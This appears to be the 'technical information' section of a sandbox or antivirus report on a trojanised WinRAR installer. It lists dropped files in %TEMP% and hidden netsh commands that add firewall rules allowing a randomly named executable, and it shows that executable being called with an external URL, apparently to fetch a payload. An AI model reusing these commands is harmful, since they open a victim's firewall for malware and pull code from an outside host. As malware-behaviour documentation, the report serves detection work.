Техническая информация
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=xzxhxaonqqvcej dir=in action=allow program="%TEMP%\nsz206C.tmp\xzxhxaonqqvcej.exe" enable=yes profile=public,private
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=xzxhxaonqqvcej dir=out action=allow program="%TEMP%\nsz206C.tmp\xzxhxaonqqvcej.exe" enable=yes profile=public,private
- %WINDIR%\syswow64\explorer.exe
- %TEMP%\nsz206c.tmp\nsexec.dll
- %TEMP%\nsz206c.tmp\winrar-x64-701.exe
- %TEMP%\nsz206c.tmp\xzxhxaonqqvcej.exe
- %TEMP%\nsz206c.tmp\xzxhxaonqqvcej.exe.config
- %TEMP%\nsz206c.tmp\selfdel.dll
- %TEMP%\nsz206c.tmp\nsexec.dll
- %TEMP%\nsz206c.tmp\selfdel.dll
- %TEMP%\nsz206c.tmp\winrar-x64-701.exe
- %TEMP%\nsz206c.tmp\xzxhxaonqqvcej.exe
- %TEMP%\nsz206c.tmp\xzxhxaonqqvcej.exe.config
- '%TEMP%\nsz206c.tmp\xzxhxaonqqvcej.exe' "http://www.pigglytransceivers.click" "%TEMP%\nsz206C.tmp\236"
- '%WINDIR%\syswow64\explorer.exe'
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=xzxhxaonqqvcej dir=out action=allow program="%TEMP%\nsz206C.tmp\xzxhxaonqqvcej.exe" enable=yes profile=public,private (со скрытым окном)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=xzxhxaonqqvcej dir=in action=allow program="%TEMP%\nsz206C.tmp\xzxhxaonqqvcej.exe" enable=yes profile=public,private (со скрытым окном)